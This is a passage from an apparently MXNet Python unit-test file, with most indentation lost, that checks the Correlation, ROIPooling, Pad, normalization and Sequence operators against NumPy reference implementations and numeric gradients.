rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe_add.forward(is_train=True, a=a_npy, b=b_npy)
exe_add.backward(out_grads=[mx.nd.array(ograd_npy, ctx=exe._ctx)])
assert_almost_equal(exe_add.grad_dict['a'],
agrad_npy + a_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe_add.grad_dict['b'],
bgrad_npy + b_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
def get_correlation(data1,data2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply):
img1 = mx.sym.Variable('img1')
img2 = mx.sym.Variable('img2')
return mx.sym.Correlation(data1=img1,data2=img2,kernel_size =kernel_size,max_displacement = max_displacement,
stride1 = stride1,stride2 = stride2,pad_size= pad_size,is_multiply = is_multiply)
def correlation_forward(data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
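    # Correlation emits one output channel per displacement in the (2r+1) x (2r+1)
    # neighbourhood with r = max_displacement // stride2; the spatial dims lose the
    # border region and are strided by stride1.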
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp2 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp1[:, :, pad_size:pad_size + data1.shape[2], pad_size:pad_size + data1.shape[3]] = data1[:,:,:,:]
tmp2[:, :, pad_size:pad_size + data2.shape[2], pad_size:pad_size + data2.shape[3]] = data2[:,:,:,:]
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
                # (x1, y1) is the location in data1; (i, j) is the location in the output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
out[nbatch, top_channel, i, j] += tmp1[nbatch, channel,y1 + h, x1 + w] * tmp2[nbatch, channel, y2 + h,x2 + w]
else:
out[nbatch, top_channel, i, j] += abs(tmp1[nbatch, channel, y1 + h, x1 + w] - tmp2[nbatch, channel, y2 + h, x2 + w])
out /= float(kernel_size**2*data1.shape[1])
return out,tmp1,tmp2
def correlation_backward(out_grad,tmp1,tmp2,data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1_grad = np.zeros(tmp1.shape)
tmp2_grad = np.zeros(tmp2.shape)
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
                # (x1, y1) is the location in data1; (i, j) is the location in the output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*tmp2[nbatch, channel, y2 + h,x2 + w]
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*tmp1[nbatch, channel, y1 + h,x1 + w]
else:
sgn = 1 if (tmp1[nbatch, channel, y1 + h,x1 + w]>=tmp2[nbatch, channel, y2 + h,x2 + w]) else -1
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*sgn
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*(-sgn)
tmp1_grad = tmp1_grad / float(kernel_size**2*data1.shape[1])
tmp2_grad = tmp2_grad / float(kernel_size**2*data1.shape[1])
return tmp1_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],tmp2_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],
def unittest_correlation(data_shape,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply,dtype):
img1 = np.random.random(data_shape)
img1 = img1.astype(dtype)
img2 = np.random.random(data_shape)
img2 = img2.astype(dtype)
net1 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply)
net2 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply )
exe1 = net1.simple_bind(default_context(),img1=img1.shape,img2=img1.shape)
exe1.arg_dict['img1'][:] = img1
exe1.arg_dict['img2'][:] = img2
#cpu forward
exe1.forward(is_train=True)
# python forward
forward_result,tmp1,tmp2 = correlation_forward(img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# forward error
assert_almost_equal(exe1.outputs[0], forward_result, rtol=1e-4, atol=1e-4)
# out_grad
a = np.ones(forward_result.shape)
out_grad1 = mx.nd.array(a,default_context())
# cpu backward
exe1.backward(out_grads=out_grad1)
# python backward
grad1,grad2 = correlation_backward(a,tmp1,tmp2,img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# backward error
assert_almost_equal(exe1.grad_dict['img1'], grad1, rtol=1e-3, atol=1e-4)
assert_almost_equal(exe1.grad_dict['img2'], grad2, rtol=1e-3, atol=1e-4)
@with_seed()
def test_correlation():
def test_infer_type(dtype):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
corr = mx.sym.Correlation(data1=a, data2=b)
arg_type1, out_type1, _ = corr.infer_type(a=dtype)
        if arg_type1[0] != np.dtype(dtype) or arg_type1[1] != np.dtype(dtype) or out_type1[0] != np.dtype(dtype):
            msg = npt.build_err_msg([a, b],
                                    err_msg="Inferred type from a is not as expected, "
                                            "Expected: %s %s %s, Got: %s %s %s"
                                            % (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
                                    names=['a', 'b'])
            raise AssertionError(msg)
arg_type2, out_type2, _ = corr.infer_type(b=dtype)
        if arg_type2[0] != np.dtype(dtype) or arg_type2[1] != np.dtype(dtype) or out_type2[0] != np.dtype(dtype):
            msg = npt.build_err_msg([a, b],
                                    err_msg="Inferred type from b is not as expected, "
                                            "Expected: %s %s %s, Got: %s %s %s"
                                            % (dtype, dtype, dtype, arg_type2[0], arg_type2[1], out_type2[0]),
                                    names=['a', 'b'])
            raise AssertionError(msg)
for dtype in ['float16', 'float32']:
test_infer_type(dtype)
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 1,stride2 = 1,pad_size = 4,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 10,stride1 = 1,stride2 = 2,pad_size = 10,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,6,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,11,11), kernel_size = 5,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
# Seed set because the test is not robust enough to operate on random data
@with_seed(1234)
def test_roipooling():
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.ROIPooling(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1)
x1 = np.random.rand(4, 3, 12, 8).astype('float32')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2], [1, 3.1, 1.1, 5.2, 10.2], [0, 3, 3, 3, 3]], dtype='float32')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'write', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'add', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1E-4)
def check_pad_with_shape(shape, xpu, pad_width, mode, dtype="float64"):
# bind with label
X = mx.symbol.Variable('X', dtype=dtype)
Y = mx.symbol.Pad(data=X, mode=mode, pad_width=pad_width)
x = mx.random.uniform(-1, 1, shape, ctx=mx.cpu(), dtype=dtype).copyto(xpu)
# numpy result
pad_grouped = list(zip(*[iter(list(pad_width))] * 2))
np_out = np.pad(x.asnumpy(), pad_grouped, mode)
# mxnet result
grad = mx.nd.empty(shape, ctx = xpu, dtype=dtype)
exec1 = Y.bind(xpu, args = [x], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0]
# compare numpy + mxnet
assert_almost_equal(out, np_out)
# grad check
check_numeric_gradient(Y, [x.asnumpy()], numeric_eps=1e-2, rtol=1e-2)
@with_seed()
def test_pad():
ctx = default_context()
shape1 = (2, 3, 3, 5)
pad1 = (0, 0, 0, 0, 1, 2, 3, 4)
shape2 = (2, 3, 3, 5, 4)
pad2 = (0, 0, 0, 0, 1, 2, 3, 4, 3, 1)
# note: this op doesn't support ints yet. Add tests when supported
dtypes = ["float16", "float32", "float64"]
for dtype in dtypes:
check_pad_with_shape(shape1, ctx, pad1, 'constant', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'edge', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'constant', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'edge', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'reflect', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'reflect', dtype)
def np_instance_norm(data, weight, bias, eps):
spatial_dims = data.shape[2::]
num_spatial_vals = np.prod(np.array(spatial_dims))
scale = 1/float(num_spatial_vals)
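    # Instance norm reference: each (sample, channel) slice is normalized over its own
    # spatial dims, then scaled and shifted by the per-channel weight and bias.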
sum_axis = tuple(range(2, data.ndim))
mean = scale * np.sum(data, axis = sum_axis)
mean = np.reshape(np.repeat(mean, num_spatial_vals), data.shape)
var = scale * np.sum((data - mean)**2, axis = sum_axis)
var = np.reshape(np.repeat(var, num_spatial_vals), data.shape)
weightBatch = np.tile(weight, (data.shape[0], 1))
weightBatch = np.reshape(np.repeat(weightBatch, num_spatial_vals), data.shape)
biasBatch = np.tile(bias, (data.shape[0], 1))
biasBatch = np.reshape(np.repeat(biasBatch, num_spatial_vals), data.shape)
return weightBatch * (data - mean)/np.sqrt(var + eps) + biasBatch
def check_instance_norm_with_shape(shape, xpu):
# bind with label
eps = 0.001
X = mx.symbol.Variable('X')
G = mx.symbol.Variable('G')
B = mx.symbol.Variable('B')
Y = mx.symbol.InstanceNorm(data=X, beta=B, gamma=G, eps=eps)
x = mx.random.normal(0, 1, shape, ctx=mx.cpu()).copyto(xpu)
gamma = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
beta = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
np_out = np_instance_norm(x.asnumpy(), gamma.asnumpy(), beta.asnumpy(), eps)
exec1 = Y.bind(xpu, args = {'X':x, 'G':gamma, 'B':beta})
exec1.forward(is_train=False)
out = exec1.outputs[0]
assert_almost_equal(out, np_out, rtol=1e-4, atol=1e-4)
check_numeric_gradient(Y, {'X':x.asnumpy(), 'G':gamma.asnumpy(), 'B':beta.asnumpy()},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
@with_seed()
def test_instance_normalization():
check_instance_norm_with_shape((1, 1, 1), default_context())
check_instance_norm_with_shape((2, 1, 2), default_context())
check_instance_norm_with_shape((2,4,5,6), default_context())
check_instance_norm_with_shape((3,3,2,3,2,1,1), default_context())
def check_l2_normalization(in_shape, mode, dtype, norm_eps=1e-10):
ctx = default_context()
data = mx.symbol.Variable('data')
out = mx.symbol.L2Normalization(data=data, mode=mode, eps=norm_eps)
in_data = np.random.uniform(-1, 1, in_shape).astype(dtype)
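    # Reference computation: 'channel' normalizes each pixel's channel vector, 'spatial'
    # normalizes each (n, c) plane, and 'instance' normalizes each whole sample.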
# calculate numpy results
if mode == 'channel':
assert in_data.ndim > 2
np_norm = np.linalg.norm(in_data, axis=1) + norm_eps
np_norm = np.repeat(1. / np.expand_dims(np_norm, axis=1), in_data.shape[1], axis=1)
np_out = np.multiply(in_data, np_norm)
elif mode == 'spatial':
assert in_data.ndim > 2
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], s[1], -1)), axis=2) + norm_eps
        np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size // (s[0] * s[1]), axis=2)
np_out = np.multiply(in_data, np_norm.reshape(s))
elif mode == 'instance':
assert in_data.ndim > 1
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], -1)), axis=1) + norm_eps
        np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size // s[0], axis=1)
np_out = np.multiply(in_data, np_norm.reshape(s))
else:
raise RuntimeError('Unknown l2 normalization mode')
exe = out.simple_bind(ctx=ctx, data=in_data.shape)
output = exe.forward(is_train=True, data=in_data)
# compare numpy + mxnet
    assert_almost_equal(exe.outputs[0], np_out, rtol=1e-2 if dtype == 'float16' else 1e-5, atol=1e-5)
# check gradient
check_numeric_gradient(out, [in_data], numeric_eps=1e-3, rtol=1e-2, atol=5e-3)
@with_seed()
def test_l2_normalization():
for dtype in ['float16', 'float32', 'float64']:
for mode in ['channel', 'spatial', 'instance']:
nbatch = random.randint(1, 4)
nchannel = random.randint(3, 5)
height = random.randint(4, 6)
check_l2_normalization((nbatch, nchannel, height), mode, dtype)
width = random.randint(5, 7)
check_l2_normalization((nbatch, nchannel, height, width), mode, dtype)
def check_layer_normalization(in_shape, axis, eps, dtype=np.float32,
forward_check_eps=1E-3, backward_check_eps=1E-3,
npy_grad_check=True, finite_grad_check=True):
def npy_layer_norm(data, gamma, beta, axis=1, eps=1E-5):
if axis < 0:
axis += data.ndim
broadcast_shape = [1 for _ in range(data.ndim)]
broadcast_shape[axis] = data.shape[axis]
mean = data.mean(axis=axis, keepdims=True).astype(dtype)
var = data.var(axis=axis, keepdims=True).astype(dtype)
std = np.sqrt(var + dtype(eps)).astype(dtype)
out = np.reshape(gamma, broadcast_shape) * (data - mean) / std + \
np.reshape(beta, broadcast_shape)
return out
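    # npy_layer_norm_grad implements the analytic LayerNorm gradients: with
    # x_hat = (x - mean) / std and w = dy * gamma / std,
    #   dx     = w - mean(w) - x_hat * mean(w * x_hat)   (means taken along `axis`)
    #   dgamma = sum(dy * x_hat), dbeta = sum(dy)         (summed over all other axes)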
def npy_layer_norm_grad(data, gamma, out_grad, axis, eps):
if axis < 0:
axis += data.ndim
exclude_axis = tuple([ele for ele in range(data.ndim) if ele != axis])
data_mean = data.mean(axis=axis, keepdims=True)
data_var = data.var(axis=axis, keepdims=True)
data_std = np.sqrt(data_var + eps)
centered_data = (data - data_mean) / data_std
gamma_grad = (centered_data * out_grad).sum(axis=exclude_axis, keepdims=True)
beta_grad = out_grad.sum(axis=exclude_axis, keepdims=True)
w = out_grad * gamma.reshape([1 if i != axis else data.shape[axis] for i in range(data.ndim)])\
/ data_std
data_grad = w - w.mean(axis=axis, keepdims=True)\
- centered_data * (w * centered_data).mean(axis=axis, keepdims=True)
gamma_grad = gamma_grad.reshape((-1,))
beta_grad = beta_grad.reshape((-1,))
return data_grad, gamma_grad, beta_grad
ctx = default_context()
data = np.random.normal(0, 1, in_shape).astype(dtype)
gamma = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
beta = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
data_s = mx.symbol.Variable('data')
gamma_s = mx.symbol.Variable('gamma')
beta_s = mx.symbol.Variable('beta')
out_s = mx.symbol.LayerNorm(data=data_s, gamma=gamma_s, beta=beta_s, axis=axis, eps=eps)
exe = out_s.simple_bind(ctx, data=in_shape)
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
out_nd = exe.forward()[0]
out = npy_layer_norm(data, gamma, beta, axis, eps)
assert_almost_equal(out, out_nd, forward_check_eps, forward_check_eps)
if finite_grad_check:
for req in ['write', 'add']:
check_numeric_gradient(out_s, {'data': data, 'gamma': gamma, 'beta': beta},
grad_nodes={'data': req, 'gamma': req, 'beta': req},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
if npy_grad_check:
# Test for grad_req = write
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
exe = out_s.simple_bind(ctx, data=in_shape, grad_req='write')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad =\
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(), gt_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(), gt_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(), gt_beta_grad, backward_check_eps, backward_check_eps)
# Test for grad_req = add
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_data_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_gamma_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
init_beta_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
exe = out_s.simple_bind(ctx, data=in_shape, grad_req='add')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.grad_dict['data'][:] = init_data_grad
exe.grad_dict['gamma'][:] = init_gamma_grad
exe.grad_dict['beta'][:] = init_beta_grad
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad = \
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(),
gt_data_grad + init_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(),
gt_gamma_grad + init_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(),
gt_beta_grad + init_beta_grad, backward_check_eps, backward_check_eps)
@with_seed()
def test_norm():
try:
import scipy
assert LooseVersion(scipy.__version__) >= LooseVersion('0.1')
from scipy.linalg import norm as sp_norm
except (AssertionError, ImportError):
print("Could not import scipy.linalg.norm or scipy is too old. "
"Falling back to numpy.linalg.norm which is not numerically stable.")
from numpy.linalg import norm as sp_norm
def l1norm(input_data, axis=0, keepdims=True):
return np.sum(abs(input_data), axis=axis, keepdims=keepdims)
def l2norm(input_data, axis=0, keepdims=True):
return sp_norm(input_data, axis=axis, keepdims=keepdims)
ctx = default_context()
data = mx.symbol.Variable('data')
in_data_dim = random_sample([2,3,4], 1)[0]
in_shape = rand_shape_nd(in_data_dim, dim=5)
epsilon = 1e-3
acc_type = {np.float16: np.float32, np.float32: np.float32, np.float64: np.float64,
np.int32: np.int32, np.int64: np.int64}
dtype_to_str = {np.float16: 'float16', np.float32: 'float32', np.float64: 'float64',
np.int32: 'int32', np.int64: 'int64'}
is_windows = sys.platform.startswith('win')
for enforce_safe_acc in ["1", "0"]:
if is_windows:
if enforce_safe_acc == "0":
break
enforce_safe_acc = "0" if "MXNET_SAFE_ACCUMULATION" not in os.environ else os.environ["MXNET_SAFE_ACCUMULATION"]
else:
os.environ["MXNET_SAFE_ACCUMULATION"] = enforce_safe_acc
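        # MXNET_SAFE_ACCUMULATION=1 is expected to make reductions accumulate in a wider
        # type (e.g. float32 for float16 inputs); the acc_type/out_dtype bookkeeping below
        # mirrors that behaviour.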
for order in [1, 2]:
for dtype in [np.float16, np.float32, np.float64]:
for i in range(in_data_dim):
for out_dtype in ['float32', 'float64']:
backward_dtype = np.float32 if out_dtype == 'float32' else np.float64
accumulation_type = acc_type[dtype]
if enforce_safe_acc == "0":
backward_dtype = dtype
out_dtype = dtype_to_str[dtype]
accumulation_type = dtype
skip_backward = 'int' in out_dtype
in_data = np.random.uniform(-1, 1, in_shape).astype(accumulation_type)
in_data[abs(in_data) < epsilon] = 2 * epsilon
norm_sym = mx.symbol.norm(data=data, ord=order, axis=i, out_dtype=out_dtype, keepdims=True)
                        npy_out = l1norm(in_data, i) if order == 1 else l2norm(in_data, i)
                        npy_out_backward = np.sign(in_data) if order == 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data.astype(dtype)], [npy_out.astype(out_dtype)],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=1e-4 if dtype == np.float16 else 1e-5, ctx=ctx, dtype=dtype)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data.astype(dtype)],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward], rtol=1e-3, atol=1e-5, ctx=ctx,
dtype=backward_dtype)
# Disable numeric gradient https://github.com/apache/incubator-mxnet/issues/11509
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
if i < in_data_dim-1:
norm_sym = mx.symbol.norm(data=data, ord=order, axis=(i, i+1), keepdims=True)
                            npy_out = l1norm(in_data, (i, i+1)) if order == 1 else l2norm(in_data, (i, i+1))
                            npy_out_backward = np.sign(in_data) if order == 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data], [npy_out.astype(dtype)],
rtol=1e-2 if dtype is np.float16 else 1e-3,
atol=1e-4 if dtype is np.float16 else 1e-5, ctx=ctx)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward.astype(out_dtype)],
rtol=1e-3, atol=1e-5, ctx=ctx, dtype=backward_dtype)
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
@pytest.mark.parametrize('enforce_safe_acc', ['1', '0'])
@pytest.mark.parametrize('dtype,forward_check_eps,backward_check_eps,in_shape_l,finite_grad_check_l', [
(np.float16, 1E-2, 1E-2, [(10, 6, 5), (10, 10)], [True, True]),
(np.float32, 1E-3, 1E-3, [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False]),
(np.float64, 1E-4, 1E-4, [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False])
])
def test_layer_norm(enforce_safe_acc, dtype, forward_check_eps, backward_check_eps,
in_shape_l, finite_grad_check_l):
os.environ["MXNET_SAFE_ACCUMULATION"] = enforce_safe_acc
for in_shape, finite_grad_check in zip(in_shape_l, finite_grad_check_l):
for axis in range(-len(in_shape), len(in_shape)):
for eps in [1E-2, 1E-3]:
if dtype == np.float16:
npy_grad_check = False
else:
npy_grad_check = True
check_layer_normalization(in_shape, axis, eps, dtype=dtype,
forward_check_eps=forward_check_eps,
backward_check_eps=backward_check_eps,
npy_grad_check=npy_grad_check,
finite_grad_check=finite_grad_check)
# Numpy Implementation of Sequence Ops
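# All three numpy references first move the sequence axis to position 1 so that each
# batch row can be processed according to its own length.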
def sequence_last_numpy(array, lengths, axis):
# create new array of dims [batch, seqlen, ...]
array2 = np.moveaxis(array, axis, 1)
dims = array2.shape
if lengths is None:
return array2[:, -1]
lengths = list(lengths)
return np.array([array2[i, int(lengths[i]) - 1] for i in range(dims[0])])
def sequence_mask_numpy(array, lengths, axis, value):
if lengths is None:
return array
arrayMask = array.copy()
# conform to [batch, seqlen, ...]
arrayMask = np.moveaxis(arrayMask, axis, 1)
shape = arrayMask.shape
lengths = list(lengths)
for i in range(shape[0]):
arrayMask[i, int(lengths[i]):] = value
return np.moveaxis(arrayMask, 1, axis)
def sequence_reverse_numpy(array, lengths, axis):
rarray = array.copy()
# conform to [batch, seqlen, ...]
rarray = np.moveaxis(rarray, axis, 1)
shape = rarray.shape
if lengths is None:
lengths = [shape[1]] * shape[0]
lengths = list(lengths)
for i in range(shape[0]):
j = int(lengths[i])
rarray[i,:j] = rarray[i,:j][::-1]
return np.moveaxis(rarray, 1, axis)
def check_sequence_func(ftype, mask_value=0, axis=0):
# bind with label
xpu = default_context()
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L') # lengths
shapes = [(3, 4), (1, 1), (3, 4, 3, 1, 1)]
for seqlenQ in [True, False]:
for ary_dtype in [np.float32]:
for idx_dtype in [np.int32, np.float32]:
for s in shapes:
x = mx.random.uniform(-1, 1, s, ctx=mx.cpu()).astype(ary_dtype).copyto(xpu)
batch = s[1] if (axis == 0) else s[0]
seqlen = s[axis]
l_np = np.random.randint(1, seqlen + 1, batch)
l = mx.nd.array(l_np, ctx=mx.cpu(), dtype=idx_dtype).copyto(xpu)
if not seqlenQ:
l_np = None
args = {'data':X, 'use_sequence_length':seqlenQ, "axis":axis}
if seqlenQ:
args['sequence_length'] = L
if ftype == "last":
Y = mx.symbol.SequenceLast(**args)
np_out = sequence_last_numpy(x.asnumpy(), l_np, axis)
elif ftype == "mask":
args['value'] = mask_value
Y = mx.symbol.SequenceMask(**args)
np_out = sequence_mask_numpy(x.asnumpy(), l_np, axis, mask_value)
elif ftype == "reverse":
Y = mx.symbol.SequenceReverse(**args)
np_out = sequence_reverse_numpy(x.asnumpy(), l_np, axis)
fargs = [x, l] if seqlenQ else [x]
gargs = [x.asnumpy(), l_np] if seqlenQ else [x.asnumpy()]
check_symbolic_forward(Y, fargs, [np_out], dtype="asnumpy")
check_numeric_gradient(Y, gargs, grad_nodes={'X':'write'},
numeric_eps=1e-2, rtol=1e-2)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'add'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'null'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
@with_seed()
@pytest.mark.skip(reason="Flaky test: https://github.com/apache/incubator-mxnet/issues/11395")
def test_sequence_last():
check_sequence_func("last", axis=0)
check_sequence_func("last", axis=1)
@with_seed()
def test_sequence_mask():
check_sequence_func("mask", axis = 0, mask_value=-2.3)
check_sequence_func("mask", axis = 1, mask_value=0.3)
def check_sequence_reverse(xpu):
# sample data
arr = np.array(
[[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr1 = np.array(
[[[ 13., 14., 15.],
[ 16., 17., 18.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]]])
arr2 = np.array(
[[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr3 = np.array(
[[[ 7., 8., 9.],
[ 16., 17., 18.]],
[[ 1., 2., 3.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 4., 5., 6.]]])
# test for matrix case
seq_len_1 = [1, 2, 2]
arr_4 = np.array([[7., 8., 9.], [16., 17., 5.4]], dtype=np.float32)
arr_5 = np.array([[7., 17., 5.4], [16., 8., 9.]], dtype=np.float32)
def test_wrapper(arr, xpu, sequence_length=None, use_sequence_length=False):
# MxNet symbol creation
seq = mx.sym.Variable('seq')
if sequence_length and use_sequence_length:
seq_len = mx.sym.Variable('seq_len')
else:
# ensure that both are disabled, not just one
seq_len=None
use_sequence_length=False
rev = mx.sym.SequenceReverse(data=seq, sequence_length=seq_len, use_sequence_length=use_sequence_length)
# MxNet symbol execution
if sequence_length:
bound = rev.bind(xpu, {'seq': mx.nd.array(arr), 'seq_len': mx.nd.array(sequence_length)})
else:
bound = rev.bind(xpu, {'seq': mx.nd.array(arr)})
fwd = bound.forward()
